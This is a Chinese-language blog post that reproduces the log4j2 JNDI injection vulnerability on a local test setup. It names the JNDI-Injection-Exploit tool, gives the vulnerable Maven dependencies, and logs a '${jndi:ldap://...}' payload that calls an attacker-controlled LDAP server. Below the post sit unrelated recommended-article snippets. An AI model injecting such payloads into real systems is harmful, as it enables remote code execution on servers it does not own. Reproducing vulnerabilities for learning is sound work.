程序员经验分享-hwhale

log4j2 JNDI注入漏洞问题复现

2023-10-31

最近大家应该都有被log4j2的JNDI注入漏洞搞的心烦意乱,当程序将用户输入的数据进行日志输出时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

以下为改问题的复现方法:

1、首先下载JNDI-Injection 起 RMI 或者 LDAP 服务

①前往这里下载

②使用以下命令启动服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

 如下为启动后的截图,马赛克仅为我的ip

2、本地新建一个maven项目

①pom引用如下

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
	<artifactId>log4j-core</artifactId>
	<version>2.12.1</version>
</dependency>
<dependency>
	<groupId>org.apache.logging.log4j</groupId>
	<artifactId>log4j-api</artifactId>
	<version>2.12.1</version>
</dependency>

 ②直接使用main方法输出日志,代码如下,你的ip 需要自己修改

public class App {
	private static final Logger logger = LogManager.getLogger(App.class);
	public static void main(String[] args) {
		logger.error(" ${jndi:ldap://你的ip:1389/log4jtest}");
	}
}

3、ldap服务端有日志输出,则说明问题复现,如下截图

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Log4j

安全

安全漏洞

log4j2 JNDI注入漏洞问题复现 的相关文章

随机推荐

  • 7.27 Qt

    制作简易小闹钟 Timer pro QT core gui texttospeech greaterThan QT MAJOR VERSION 4 QT widgets CONFIG c 11 The following define ma

  • ubuntu 配置nfs 出现Failed to start nfs.service: Unit nfs.service not found

    ubuntu 10 0开启配置nfs 服务service nfs start时出现 Failed to start nfs service Unit nfs service not found 原因是ubuntu 10 0以上的版本取消了s

  • Pycharm--flake8的配置使用

    前言 Flake8 是由Python官方发布的一款辅助检测Python代码是否规范的工具 Flake8检查规则灵活 支持集成额外插件 扩展性强 一 安装flake8 进入虚拟环境 pip install flake8 二 在pycharm中

  • 安装imageio

    在python下安装imageio cmd中输入如下 pip install imageio

  • EWM100学习笔记(一)

    Unit 1 EWM与WM模块的差异 英文不太好 大概翻译了一部分内容 第一张大概介绍了一下WM与EWM各自的作用 最后总结了一下EWM相比WM的优势 SAP的常规操作 S 4后干脆就直接没有了WM模块 直接推EWM WM主要的功能 Tra

  • CSS-颜色属性+颜色函数+自定义变量

    最近更新时间 2017年5月8日16 08 13 我的博客地图 离开校园踏入职场 不是到达人生巅峰 而是人生才刚刚开始 校园里学的知识远不足工作需求 而且校园里的学习深度也比较浅显 因此 对于刚毕业前三年的工程师来说 马不停蹄不分昼夜的学习

  • 睿智的目标检测41——Pytorch搭建Retinanet目标检测平台

    睿智的目标检测41 Keras搭建Retinanet目标检测平台 学习前言 什么是Retinanet目标检测算法 源码下载 Retinanet实现思路 一 预测部分 1 主干网络介绍 2 从特征获取预测结果 3 预测结果的解码 4 在原图上

  • 思维模式

    1 整体思维 整体宏观的思考 2 反向思维 不断的问自己如果不这样 3 方法思维 不断的寻找方法 不断的提高自己 从知识范围 方法等宏观角度 还有特有技术方向

  • 字符输入流

    字符输入流 Character Input Stream 是用于从输入源 如文件 网络连接等 读取字符数据的流对象 在 Java 中 主要使用 java io Reader 及其子类来实现字符输入流的操作 FileReader 是 Java

  • uniapp 页面跳转的坑

    uniapp 页面跳转的坑 我们在使用 uniapp 的时候 经常使用到页面跳转 uniapp 的几个常用跳转我就不一一列表了 我就说我遇到的坑吧 如下图 我要从第一个页面跳到第二个页面 我在组件里面写的跳转 大家移位到下一张图 如下图 这

  • LaTex 使用特殊章节符号 (§)

    参考 LaTex 使用特殊章节符号 LaTex 使用特殊章节符号 在 tex文件开头 加上以下内容 usepackage utf8 inputenc usepackage cleveref crefname section Crefname

  • Android动画进阶指北

    原文链接 Android Animation Advanced Tricks 前面的文章介绍了动画的基本使用方法 本文来聊一聊涉及到动画的高级技巧 以及一些非常优质的学习资源和动画三方库和框架 页面之间的过渡动画 常规的动画都是针对某一页面

  • java配置文件中数据库密码加密

    最近 有位读者私信我说 他们公司的项目中配置的数据库密码没有加密 编译打包后的项目被人反编译了 从项目中成功获取到数据库的账号和密码 进一步登录数据库获取了相关的数据 并对数据库进行了破坏 虽然这次事故影响的范围不大 但是这足以说明很多公司

  • VScode使用pip已经下载了faker,但还是报错ModuleNotFoundError: No module named ‘faker‘

    修复一下pip python m ensurepip pip install faker 但是在安装faker的时候 出现了这样的情况 提示warning 换一种写法 pip install faker i http pypi douban

  • 给定一个介于0和1之间的实数,类型为double,打印它的二进制表示

    给定一个介于0和1之间的实数 0 625 类型为double 打印它的二进制表示 如果该数字无法精准地用32位以内的二进制表示 则打印 ERROR 先上代码 public class printbinary public static vo

  • ABAP DOI 技术

    用户提出的报表 是用EXCLE显示的 有许多特殊格式 比如 加粗 大小字体等 普通的ALV报表输出并不能满足用户的要求 那么只能用ALV与EXCLE的集成技术 目前已知的技术有两种 一种是OLE技术 用SMW0上传模板 然后填写数据 多数用

  • Springboot的pom.xml需要用到的依赖总结:

  • 蜣螂优化(DBO)算法(含MATLAB代码)

    先做一个声明 文章是由我的个人公众号中的推送直接复制粘贴而来 因此对智能优化算法感兴趣的朋友 可关注我的个人公众号 启发式算法讨论 我会不定期在公众号里分享不同的智能优化算法 经典的 或者是近几年提出的新型智能优化算法 并附MATLAB代码

  • python怎么生成词云图

    词云图是什么 词云图又称文字云 是信息可视化的表现形式之一 词云是把文本中出现频率较高的关键词进行视觉上的突出显示 形成关键词云层或关键词渲染 从而过滤掉大量的文本信息 读者可以快速领略文本的主旨 相对柱状图 折线图 饼图等用来显示数据的图

  • log4j2 JNDI注入漏洞问题复现

    最近大家应该都有被log4j2的JNDI注入漏洞搞的心烦意乱 当程序将用户输入的数据进行日志输出时 即可触发此漏洞 成功利用此漏洞可以在目标服务器上执行任意代码 以下为改问题的复现方法 1 首先下载JNDI Injection 起 RMI

热门标签